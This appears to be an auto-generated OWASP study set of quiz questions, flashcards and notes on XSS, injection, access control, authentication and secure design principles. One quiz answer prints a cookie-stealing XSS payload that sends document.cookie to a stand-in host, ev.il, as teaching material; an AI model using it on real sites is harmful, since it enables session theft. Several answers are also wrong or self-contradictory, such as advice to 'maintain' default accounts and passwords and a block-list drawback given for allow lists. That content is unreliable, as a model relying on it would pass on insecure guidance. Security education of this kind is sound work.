OWASP Overview and Core Values

Questions and Answers

What should be ensured when storing sensitive data?

• Use weak algorithms to increase processing speed.
• Ensure that the cryptographic protection remains secure even if access controls fail. (correct)
• Only store sensitive data that is outdated.
• Sensitive data should be encrypted with any method available.

Which of the following practices supports good cryptographic storage design?

• Storing plain text passwords for easy access.
• Using strong approved Authenticated Encryption. (correct)
• Keeping cryptographic keys publicly accessible.
• Avoiding regulations on the use of cryptography.

What is a common issue related to insecure dependencies?

• Using software that is vulnerable, unsupported, or out of date. (correct)
• Knowing the version of dependencies accurately.
• Monitoring component configuration regularly.
• Regularly patching outdated software components.

Which action contributes to preventing issues related to dependencies?

Continuously monitoring for vulnerabilities. (B)

What is an ineffective approach to securing software components?

Patch management processes are insufficient or missing. (C)

What is the primary approach of Allow List Input Validation?

Block all user inputs unless explicitly allowed (A)

Which of the following is an example of a situation where Client Side Validation can be bypassed?

By editing headers and data in a browser's developer tools (A)

What is a major drawback of using Block List Input Validation?

It must be regularly updated to address new attack patterns (B)

What does injection in the context of application security refer to?

Executing unintended commands in an application (D)

Which statement best describes the nature of Allow List Input Validation?

It is less effective over time if not maintained (C)

How should an HTML sanitizer be utilized when handling user input?

By sanitizing larger HTML chunks provided by the user (B)

What is a common method attackers use to exploit broken access control?

Changing the primary key to another user's record (C)

Which type of privilege escalation involves accessing another user's data at the same level?

Horizontal Privilege Escalation (D)

What is a significant characteristic of negative security rules in input validation?

Require a comprehensive understanding of potential attacks (D)

Which of the following is a recommended prevention measure for access control issues?

Deny access to private resources by default (D)

Which of the following is NOT a potential interpreter type where injection can occur?

Excel (B)

What should access tokens do upon user logout to enhance security?

Be invalidated on the server (C)

What is an effective way to enforce access control mechanisms within an application?

Reuse access control mechanisms throughout the application (D)

Which of the following describes the practice of force browsing?

Attempting to view authenticated pages as an anonymous user (A)

What is a key reason to log access control failures?

To alert administrators when appropriate (A)

What does the principle of Defense in Depth primarily emphasize?

Implementing multiple barriers to manage risks (C)

What is the recommended outcome when a transaction fails?

Fail closed to prevent unauthorized access (A)

Which of the following is NOT a common attack related to broken access control?

Data encryption attacks (B)

Why should external systems be treated with caution?

They might vary in security posture and policies (D)

What role does Separation of Duties play in security?

It prevents fraud by clearly dividing responsibilities (C)

What criticism is associated with Security by Obscurity?

It relies solely on keeping security details hidden (B)

What is a key advantage of keeping security simple?

It reduces the attack surface and improves efficiency (D)

What should be avoided when developing secure systems?

Incorporating complex architectures unnecessarily (C)

What does failing securely prevent?

Unauthorised access during a failure (A)

What is a primary characteristic of Reflected XSS?

User input is included in HTML output without validation. (A)

Which of the following examples demonstrates a successful payload for stealing user sessions in an XSS attack?

new Image().src="http://ev.il/hijack.php?c="+encodeURI(document.cookie); (C)

What is the main risk associated with Stored XSS vulnerabilities?

They can impact multiple users who access stored input. (A)

In the context of XSS, what does DOM XSS primarily involve?

JavaScript frameworks dynamically incorporating problematic data. (B)

What is a common method used in an XSS redirect attack?

Changing the window location with JavaScript. (B)

Which link is an indication of a possible phishing attempt in the lottery scenario?

http://ev.il/hijack.php (B)

What is the aim of the 'document.body.background' payload in an XSS attack?

To change the background of the webpage to a malicious image. (A)

What generally happens when a user inputs data in an unsafe manner within a search field?

Potentially dangerous scripts may be executed. (A)

What is the primary mission of OWASP?

To improve the security of software (A)

Which of the following is NOT listed as a core value of OWASP?

Security Innovation (D)

Which XSS vulnerability allows an attacker to send a malicious script to a user?

Cross-Site Scripting (XSS) (D)

What are typical impacts of XSS attacks?

Steal a user's session (B)

What is a critical root cause of XSS vulnerabilities?

Including untrusted data into dynamic content without validation (D)

Which component is NOT part of the OWASP Top 10 list?

Cross-Origin Resource Sharing (A)

What principle does OWASP uphold regarding community participation?

Global participation is encouraged (D)

How does a user's browser wrongly trust the malicious script in an XSS attack?

The script comes from a trusted source (A)

Which action is a common characteristic of XSS attacks?

Redirecting users to malicious websites (D)

What does OWASP's commitment to openness entail?

All finances and code are transparently shared (C)

Flashcards

Strong Cryptographic Storage

Implementing robust security measures for storing sensitive data.

Authenticated Encryption

Using encryption methods that verify the authenticity and integrity of data during decryption.

Salted One-way Hash

Storing passwords as one-way hashes with a random salt, making them harder to crack.

Insecure Dependencies

Using outdated or vulnerable software components that can lead to security breaches.

Vulnerability Management

Regularly scanning for and patching vulnerabilities in software components to prevent attacks.

Broken Access Control Impact

Exploiting vulnerabilities in access control mechanisms can lead to unauthorized access to sensitive data, functionality, or user accounts.

Modifying URL, Internal State, or HTML

Attackers can manipulate these elements to bypass access controls and gain unauthorized access. For example, changing a URL parameter to access a restricted page.

Primary Key Manipulation

Attackers modify identifying keys within databases, like user IDs, to access data belonging to other users.

Privilege Escalation

An attacker gains unauthorized access with higher privileges, such as acting as an administrator when logged in as a regular user.

Vertical Privilege Escalation

Gaining access to a higher level of authority or permission within the system.

Horizontal Privilege Escalation

Gaining access to data or resources belonging to another user with equal privilege level.

Metadata Manipulation

Attackers tamper with metadata associated with access control tokens, cookies, or hidden fields to bypass security measures.

Access Control Design Principles

These principles help secure applications by enforcing access controls effectively and consistently.

Output Encoding

Transforming user-supplied input before displaying it to prevent malicious code execution. It ensures that user input is displayed as intended and not interpreted as code.

Input Validation

A security measure that checks user input against predefined rules to prevent malicious data from entering an application.

Allow List Validation

A type of input validation that only allows specific characters or patterns, blocking anything else. It's a proactive approach to preventing security issues.

Block List Validation

A type of input validation that blocks specific characters or patterns, allowing everything else. It's a reactive approach to security.

Injection

A type of attack where malicious code is injected into an application's input, causing it to execute the injected code instead of its intended instructions.

Client Side Validation

Validation performed on the user's browser before data is sent to the server. It's useful for improving user experience but is NOT a secure method to prevent attacks.

Interpreter

A program that translates code written in one language into another language, typically machine code, for execution.

Bypassing Client Side Validation

Attackers can bypass client-side validation by modifying the data being sent to the server before it's processed. They can either disable client-side validation or tamper with the data.

Defense in Depth

Multiple security layers protect against vulnerabilities. Various controls target different attack methods, making exploitation harder.

Fail Securely

When an action fails (transaction, code execution), the system should lock down (fail closed) to prevent unauthorized access or data compromise.

Don't Trust Services

Always treat external services with suspicion, assuming they may have different security practices and vulnerabilities. Never implicitly trust external systems.

Separation of Duties

Different people should manage different functions. For example, administrators should not also be users of the system they manage. This reduces the chance of fraud and misuse.

Security by Obscurity

This is a weak security approach. It relies on keeping details hidden, rather than using strong controls. If these hidden details are discovered, the system is vulnerable.

Keep Security Simple

Avoid overly complex security systems and code. Simplicity makes it easier to analyze, understand, and secure.

Attack Surface

The parts of a system that are exposed to potential attacks. Less exposed surface means fewer entry points for attackers.

Double Negatives

Avoid using complex logic with double negatives in security code. These can make errors hard to detect and security difficult to comprehend.

XSS (Cross-Site Scripting)

A type of web security vulnerability that allows attackers to inject malicious scripts into a website, which are then executed by the user's browser. This allows attackers to steal user data, hijack sessions, and manipulate the website's behavior.

Reflected XSS

A type of XSS where the attacker's malicious script is reflected back to the user's browser immediately after they submit it. This happens when a website includes unvalidated and unescaped user input directly into the HTML output.

Stored XSS

A type of XSS where the attacker's malicious script is stored persistently on the website's server and executed by other users when they view the affected content. This occurs when a website stores unsanitized user input that is later retrieved and displayed to other users.

DOM XSS

A type of XSS that leverages the Document Object Model (DOM) of web pages to manipulate the page's behavior based on attacker-controlled data. This often occurs in single-page applications and JavaScript frameworks where dynamic content is rendered.

XSS Attack Payload

The malicious script code injected by the attacker during an XSS attack. This code can perform various actions like stealing user data, redirecting the user, or defacing the website.

HTML Injection

A type of XSS attack where the attacker injects malicious HTML code into the website. This code can be used to create new HTML elements, manipulate existing elements, and even inject malicious scripts.

Unescaped User Input

User input that is inserted into a website without proper escaping or sanitization, making it vulnerable to XSS attacks. This is because special characters that have meaning in HTML can be used to inject malicious code.

Sanitization

The process of removing or encoding harmful characters from user input before it is displayed on the website. This prevents XSS attacks by ensuring that the input cannot be interpreted as malicious code.

What is OWASP?

The Open Web Application Security Project® (OWASP) is a non-profit foundation dedicated to improving software security. They achieve this through open-source projects, global chapters, and educational initiatives.

What are OWASP's core values?

OWASP operates with four core values: Openness, Innovation, Global reach, and Integrity.

What is OWASP Top 10?

It's a prioritized list of the most common and critical web application security risks. This list helps developers and security professionals focus on the most important vulnerabilities and address them.

What is Injection (OWASP Top 10 #1)?

An attacker can exploit injection vulnerabilities to gain unauthorized access to data or disrupt the application's functionality by injecting malicious code into inputs.

What is Sensitive Data Exposure (OWASP Top 10 #3)?

This happens when sensitive data like passwords or credit card details is not properly protected, exposing it to unauthorized access.

What is Broken Access Control (OWASP Top 10 #5)?

This vulnerability occurs when a user can access resources or perform actions they are not authorized to, violating access control rules.

What is Cross-Site Scripting (XSS) (OWASP Top 10 #7)?

An attacker injects malicious script into a website, which is then executed by unsuspecting users' browsers, potentially stealing their information.

How does XSS work?

When a web application includes untrusted data into dynamic content without proper validation, it creates an opportunity for an attacker to insert malicious code into the website.

What are the impacts of XSS?

XSS exploits can steal user sessions, sensitive data, rewrite web pages, and redirect users to malicious websites.

Explain Typical phishing email in context of XSS

Phishing emails frequently employ XSS attacks, luring users to click on links or download attachments that contain malicious scripts, leading to stolen data or compromised devices.

Study Notes

OWASP (Open Web Application Security Project)

• OWASP is a non-profit foundation dedicated to improving software security
• It utilizes a community-driven approach with open-source projects
• The foundation offers numerous local chapters worldwide
• OWASP boasts tens of thousands of members
• It is a leading source of educational and training resources for developers and technologists to secure web applications

Core Values

• Open: Transparency in finances and code is paramount
• Innovative: Encourages exploration of new solutions for software security challenges
• Global: Welcomes participation from anywhere in the world
• Integrity: Fosters a respectful, supportive, truthful, and vendor-neutral community

OWASP Top 10

• This is a prioritized list of the most critical web application security risks
• The list is regularly updated to reflect emerging threats
• The OWASP Top 10 serves as a guide for developers to strengthen their applications against common vulnerabilities

Cross-Site Scripting (XSS)

• Attackers can inject malicious scripts into a web application
• The user's browser executes the malicious script, thinking it originates from a trusted source
• Attackers can steal user sessions, sensitive data, and rewrite HTML pages
• Vulnerabilities arise when untrusted data is included in dynamic content without validation

Root Cause of XSS

• Applications often incorporate untrusted data from HTTP requests into dynamic content
• Failure to validate this data for malicious content creates the vulnerability

Typical XSS Impacts

• Stealing user sessions
• Accessing sensitive data
• Manipulating web page content
• Redirecting users to malicious websites

XSS Exploit Example

• A web application's search field accepts input without validation
• An attacker can enter malicious HTML code (e.g., an image tag with a malicious URL)
• The application displays the attacker's code, executing it in the victim's browser

XSS Payload Examples

• Stealing user sessions
• Site defacing
• Redirecting users

Forms of XSS

• Reflected XSS: Includes unvalidated user input in HTML output
• Stored XSS: Stores unsanitized user input, which other users see later
• DOM (Document Object Model) XSS: Executes attacker-controlled data inserted in frameworks

XSS Prevention

• Do not include user-supplied input directly in your output
• Encode all user-supplied input
• Use input validation (allow-listing) to specify acceptable input
• Use HTML sanitizers for complex user input

Input Validation - Block List

• This method blocks specific input characters or patterns
• Drawback: Vulnerable to masking techniques

Input Validation - Allow List

• Only allows specific characters or patterns
• Advantage: Protects against future vulnerabilities
• Disadvantage: Defining the acceptable input characters can be complex

Bypassing Client-Side Validation

• Client-side validation is for convenience, not security
• It can be easily bypassed by directly interacting with the back-end

Injection (Example: SQL Injection)

• Tricking an application into including unintended commands in data sent to an interpreter
• Interpreters Affected: Query languages (SQL, NoSQL, HQL, LDAP, XPath), Expression languages (SpEL, JSP/JSF EL), Template engines (Freemarker, Velocity), Command-line interfaces (Bash, PowerShell)

SQL Injection - Typical Impact

• Bypassing authentication
• Spying out data
• Manipulating data
• Complete system takeover

Blind SQL Injection

• Attackers don't get direct error messages
• They use boolean conditions to deduce if the query succeeds or fails
• This process takes time to complete and can be slow

Prevention for SQL Injection

• Avoid constructing SQL statements with string manipulation
• Utilize prepared statements, parameters, or parameterized queries
• Use an interface to avoid interpreters

Prevention (Other)

• Missing appropriate security hardening across application stack: Install the latest versions of application components, properly configure and secure permissions in the cloud services, disable unnecessary features, and ensure default accounts/passwords have been disabled

Typical Flaws in Authentication

• Allowing brute-force attacks
• Implementing weak password recovery processes
• Using unsecure password storage methods (e.g., plain text, weak hashing)
• Forgetting multi-factor authentication
• Exposing session IDs in the URL

Password Strength Controls

• Enforce minimum password length, avoiding periodic password resets
• Ban commonly breached passwords
• Offer password visibility or clipboard pasting options

Secure "Forgot Password" Mechanism

• Provide uniform messages for both existing and non-existent accounts
• Use a side channel (e.g., phone call, email address) for password reset instructions
• Utilize URL tokens for password reset

Secure Password Storage

• Use bcrypt (or equivalent) password hashing algorithms
• Set a reasonable work factor (e.g., prevent brute-force cracking)
• Use a salt (modern algorithms use automatic salts)
• Consider using a pepper (for enhanced security, but less common)

Other Authentication Controls

• Use TLS (secure communication protocol)
• Implement strategies such as throttling for brute-force prevention
• Require re-authentication for sensitive features
• Offer two-factor or multi-factor authentication

Two-Factor Authentication (2FA)

• Requires two out of three types of credentials (Something you know, Something you have, Something you are)

Broken Access Control

• Applications incorrectly handling user permissions expose unauthorized functionality.
• Possible Impacts: Unauthorized access, view sensitive files, modify data, change access rights, and other privileged actions.

Access Control Design Principles

• Thoroughly design access controls up front
• Enforce access checks for all requests
• Deny access by default (unless explicitly granted access)
• Enforce principle of least privilege
• Avoid hardcoding roles
• Log all access control events

Sensitive Data

• Data like passwords, credit card numbers, personally identifiable information (PII), and business secrets warrants special protection.
• Following data protection regulations (e.g., GDPR, PCI DSS) is crucial

GDPR (General Data Protection Regulation)

• A comprehensive data privacy regulation in the EU
• Addresses the protection of personal data and the data processing

Secure Cryptographic Storage Design

• Store sensitive data only when needed, using strong encryption and salt
• Ensure cryptographic protection even under compromised access controls
• Protect secret keys from unauthorized access, following appropriate regulations for cryptography

Insecure Dependencies

• Applications using vulnerable, outdated, or unmaintained dependencies increase attack surface
• Use scanners and continuously monitor versions for known vulnerabilities and security bulletins

Insecure Configuration

• Employ appropriate server hardening measures
• Properly configure permissions and disable unused/unnecessary components
• Maintain default account/passwords

Secure Design Principles

• Minimize attack surface area
• Enforce strong default security configurations for new application features
• Provide least privilege access to users
• Employ in-depth security measures
• Ensure secure failure states when transactions/code execution fail

Don't Trust Services

• External services should not be trusted implicitly
• Treat all external services as potentially hostile entities

Separation of Duties

• Implementing a separation of duties framework for application administrators
• Prevents single points of failure

Avoid Security by Obscurity

• Hiding sensitive information or functionalities should never be the sole security measure
• Implementing other security strategies is always beneficial to maintain security

Keep Security Simple

• Maintain an uncomplicated and straightforward design.
• Prioritize clean code over intricate, complex approaches.
• Avoid complex designs or double negatives where simpler approaches are available.

Description

Explore the Open Web Application Security Project (OWASP), a non-profit foundation dedicated to enhancing software security through community-driven initiatives. Learn about its core values, the significance of the OWASP Top 10, and how this organization empowers developers to address web application security risks effectively.